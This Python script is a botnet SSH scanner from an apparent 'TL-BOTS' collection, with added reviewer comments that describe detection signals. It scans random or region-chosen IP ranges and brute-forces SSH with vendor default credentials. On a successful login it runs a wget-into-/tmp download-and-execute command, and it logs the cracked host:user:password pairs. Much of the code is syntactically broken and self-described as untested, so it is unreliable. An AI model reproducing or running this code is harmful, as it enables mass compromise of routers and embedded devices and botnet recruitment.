TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Generic.SSH/WORKINGPROGRESS.py


#!/usr/bin/python
"""
Author: ~B1NARY~
Skype: bl4ck.j3sus
XMPP: b1nary@darkness.su
Title: ~B1NARY~ PRIVATE BOTNET SCANNER
Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD
Version: 1.0
MADE DATE: 3-30-16
***THIS HAS NOT BEEN TESTED YET, IT MAY OR MAY NOT WORK***
"""
import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random
from multiproccessing import Process
# Sends paramiko's own log output to /dev/null, so the library writes no local record of its connections.
paramiko.util.log_to_file("/dev/null")
#DEFINES
# Shell command string passed to ssh.exec_command() after a successful login (see sshscanner.brutethenload):
# change to /tmp, fetch a script over plain HTTP with wget, run it with sh, then delete it.
# NOTE(review): 1.1.1.1 is presumably a placeholder for a staging host in this copy; do not treat it as an indicator.
# Detection relevance: an SSH session whose first commands are a wget into /tmp followed by sh and rm of the
# same file is a strong signal in command-audit logs; outbound HTTP filtering on embedded devices blocks the fetch.
command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh"
# userlist and passlist are flat lists of default and vendor-shipped account names and passwords.
# f() walks them in a nested loop (every userlist entry against every passlist entry).
# Audit relevance: a device that accepts any of these values on a reachable login service should be treated as exposed.
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
# "user:password" pairs iterated by sshscanner.brutethenload for each SSH target.
combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"]
# Strings that disqualify a generated address; brutethenload tests them with `in`, i.e. as a substring of the dotted address.
blacklist = ['127']
randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware',
'Start Adding Them Botz','Make The Bot Count Go Up',
'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!')
thread = threading.Thread
parser = argparse.ArgumentParser()
args = parser.parse_args()
thread_count = args.threadcount
bufferz = ''
start_time = time.time()
host = HOST
tn = socket.socket()
#BANNER
print '\r\n'
print '###############################################################################'
print '# ___ __________ ____ _______ _____ _______________.___. ___ #'
print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #'
print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #'
print '# | | \ | / | \/ | \ | \\____ | #'
print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #'
print '# \/ \/ \/ \/ \/ #'
print '###############################################################################'
print 'r\n'
raw_input('Press <ENTER> To '+randomtext)
#ARGUMENTS
# Command-line options, as described by their own help strings: a file of IPs for credential guessing (-b),
# a file of IP/user/password records for command execution (-x), an output file name (-o), a scan-while-guessing
# mode (-l), and a positional thread count.
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS")
parser.add_argument("-o","--output",type=str, help="OutputFile Name")
parser.add_argument("-l","--load",type=str, help="Scan As Bruting")
parser.add_argument("threadcount",type=str, help="# of Threads")
#THE CODING BEGINS
# Dispatch on the parsed options to mass_check, sshscanner / brutethenload and mass_pwn.
# NOTE(review): the author's header marks the file as untested; these comments describe the visible statements only.
if args.brute:
read_h = open(str(args.brute),'a+')
elif args.brute:
mass_check(args.brute)
if args.load:
sshscanner(args.load)
elif args.load:
brutethenload(args.load)
if args.execute:
mass_pwn(args.execute)
# Thread subclass whose brutethenload method generates random IPv4 addresses, probes TCP port 22 and
# tries the combolist credential pairs over SSH.
# NOTE(review): the author's header marks this file as untested; the comments describe what the visible
# statements do, for analysis and detection purposes.
class sshscanner(threading.Thread):
global combolist
# sys.argv[2] selects the addressing mode; sys.argv[3] supplies the fixed leading octets for modes A, B and C.
ipclassinfo = sys.argv[2]
global ipclassinfo
if ipclassinfo == "A":
ip1 = sys.argv[3]
global ip1
elif ipclassinfo == "B":
ip1 = sys.argv[3].split(".")[0]
ip2 = sys.argv[3].split(".")[1]
global ip1
global ip2
elif ipclassinfo == "C":
ips = sys.argv[3].split(".")
num=0
for ip in ips:
num=num+1
if num == 1:
ip1 = ip
elif num == 2:
ip2 = ip
elif num == 3:
ip3 = ip
global ip1
global ip2
global ip3
def brutethenload(self):
while 1:
try:
# Inner loop: generate candidate addresses until one passes the blacklist check.
while 1:
thisipisbad='no'
# Modes A/B/C keep one, two or three operator-supplied octets and randomise the rest.
if ipclassinfo == "A":
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "B":
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "C":
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
# Named modes draw the leading octets from hard-coded prefix lists and randomise the remaining octets.
elif ipclassinfo == "BRAZIL":
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "SUPER":
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY":
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY2":
lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "GOOD":
good = ["113.53","101.108","101.109"]
self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "ALL"
allips = ["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]
self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "RAND":
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
else:
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
# Discard the candidate when any blacklist entry occurs as a substring of the address.
for badip in blacklist:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break
username='root'
password=""
port = 22
# Plain TCP connect to port 22 with a 3-second timeout, closed again before the SSH session is opened.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.host, port))
s.close()
ssh = paramiko.SSHClient()
# AutoAddPolicy accepts whatever host key the server presents.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
# Try each "user:password" pair from combolist; "n/a" on either side stands for an empty value.
# On the server this shows up as a burst of failed password logins for several account names from one
# source address, which is what login rate limiting, key-only authentication and a disabled root
# password login are meant to stop.
for passwd in combolist:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
dobreak=True
break
# Bare except: every connection or authentication error is silently ignored.
except:
pass
if True == dobreak:
break
badserver=True
# Echo a fixed marker string and look for it in the output, to confirm that the login yields real
# command execution. The marker is constant, so it is usable as a signature in honeypot and
# command-audit logs.
stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'")
output = stdout.read()
if "gayfgt" in output:
badserver=False
if badserver == False:
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
# Runs the module-level download-and-execute `command` on the remote host, then waits 15 seconds.
ssh.exec_command(""+command+"")
time.sleep(15)
# Appends host:username:password in plaintext to the file named by sys.argv[4].
file_h = open(sys.argv[4],'a')
file_h.write(self.host+":"+username+":"+password+"\n")
file_h.close()
ssh.close()
# Bare except: any error raised during the attempt is swallowed.
except:
pass
# Read from socket `tn` until `criteria` appears in the accumulated buffer, then return the buffer.
# The loop condition compares the elapsed time since the module-level start_time with `timeout`;
# when the loop ends without a match an Exception with a "timeout" message is raised.
def sock_read_until(tn, criteria, timeout=30):
while time.time() - start_time < timeout:
# Accumulates into the name bufferz, which is also defined at module level.
bufferz += tn.recv(40960)
time.sleep(0.01)
if criteria in bufferz: return bufferz
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m')
# Read the file named by `read_h` line by line, take the first ":"-separated field of each line as an
# address, and start one thread per line that runs f() on it. Prints the active thread count as it goes.
def mass_check(read_h):
try:
for line in open(read_h).readlines())
ip_info = line.split(":")
e = Thread(target=f, args=(ip_info[0],))
e.start()
print threading.active_count()
print threading.active_count() > thread_count:
pass
# Ctrl-C kills the whole process with signal 9 instead of waiting for the worker threads.
except KeyboardInterrupt: os.kill(os.getpid(),9)
# Read `targets_file`, where each line holds address:user:password, and start one thread per line that
# runs loadem() with those three fields. Lines that fail to split or to start a thread are skipped silently.
def mass_pwn(targets_file):
try:
targets_file_h = open(targets_file).readlines()
for line in targets_file_h:
ip_info = line.split(":")
try:
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
e.start()
except:
pass
print '[Thread]: ',threading.active_count()
# Busy-waits while the number of live threads is above thread_cnt.
while threading.active_count() > thread_cnt:
pass
# Ctrl-C kills the whole process with signal 9 instead of waiting for the worker threads.
except KeyboardInterrupt: os.kill(os.getpid(),9)
# Log in to HOST with a known user/password over the module-level socket `tn`, request a shell and send
# the module-level `command`. Returns the text read after the command, or None when any step raises.
# NOTE(review): the dialogue (user name and password sent as newline-terminated text, "sh" typed at a
# prompt) looks like a plaintext Telnet-style login although the port is 22; presumably adapted from a
# Telnet loader.
def loadem(HOST,user,password):
try:
x = ''
tn.connect((HOST,22))
print tn.recv(40960)
tn.send(user + "\n")
time.sleep(1)
print sock_read_until(tn,":",10)
tn.send(password + "\n")
print "Spraying"+HOST
tn.send("sh\n\n")
time.sleep(0.01)
# Waits for a "#" prompt, then rejects the session if the reply contains any common login-failure word.
x += sock_read_until(tn,"#",10)
print '[+] Got shell! '+HOST
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked')
for line in command("\n"):
tn.send(line+'\r\n'):
x = tn.recv(40960)
# A "> " in the reply is treated as failure.
if '> ' in x: raise Exception
try:
arch = sock_read_until(tn,"#",3)
except:
arch = 'ILLEGAL!!!'
print arch
return arch
# Bare except: every error, including the deliberate raises above, is swallowed.
except:
pass
# Credential-guessing worker for one address: nested loop over userlist and passlist, talking to port 22
# through the shared module-level socket `tn`. A pair counts as valid when a fixed marker string echoed
# through the resulting shell comes back; valid pairs are appended to the file named by args.output.
# Defensive relevance: the per-address pattern is many login attempts in quick succession with different
# account names, and the constant echo marker is a usable signature in honeypot and command-audit logs.
def f(ip):
ip = ip_rstrip()
for user in userlist:
for passw in passlist:
x= ''
try:
tn.settimeout(35)
tn.connect((ip,22))
except Exception as e:
print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e
break
else:
try:
x += tn.recv(40960)
except:
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
break
else:
try:
time.sleep(0.1)
x += tn.recv(40960)
sio = StringIO.StringIO(x)
# Scans the received bytes for 251 and 253, the Telnet WILL and DO option codes, and calls
# iac_wont / iac_dont, which are not defined in the visible file.
# NOTE(review): presumably carried over from a Telnet scanner.
try:
for i in sio.read(x)
if ord(i) == 251:
iac_dont_b = 1
elif ord(i) == 253:
iac_dont_b = 1
elif iac_wont_b == 1:
iac_wont(tn,ord(i))
iac_wont_b = 01
elif iac_dont_b = 1:
iac_dont(tn,ord(i))
iac_dont_b = 0
except:
print "THATS ILLEGAL!!!"
tn.send(user + "\r\n")
time.sleep(0.01)
# A banner containing 'User Access Verification' aborts this attempt.
if 'User Access Verification' in x:
raise Exception('cisco dicks')
x += tn.recv(409600)
tn.send("sh\n\n")
time.sleep(0.01)
tn.send("shell\n\n")
time.sleep(0.01)
sock_read_until(tn,"#")
# Sends an echo of a hex-escaped marker and then waits for the decoded marker in the reply.
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n")
time.sleep(0.01)
x += tn.recv(409600)
time.sleep(0.01)
try:
x += sock_read_until(tn,"binfagt")
if 'binfagt' not in x:
raise Exception('no binfagt')
# Also requires some prompt character and the absence of common login-failure words.
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x:
raise Exception('no prompt')
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x):
raise Exception('fucked')
except:
print "[failed execution]",e,ip.rstrip()
continue
else:
# Appends address:user:password in plaintext to the output file.
file_h = open(args.output,'a+')
file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n')
file_h.close()
print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip
break
except Execution as e:
continue
continue
continue
continue
return
# Start as many sshscanner threads as sys.argv[1] says; a failure to create or start one is ignored.
for x in range(0,int(sys.argv[1])):
try:
t = sshscanner()
t.start()
except:
pass
# NOTE(review): the remaining lines repeat the random-address and blacklist statements from
# sshscanner.brutethenload and refer to `self` outside any method; presumably a leftover paste.
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
for badip in blacklist:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break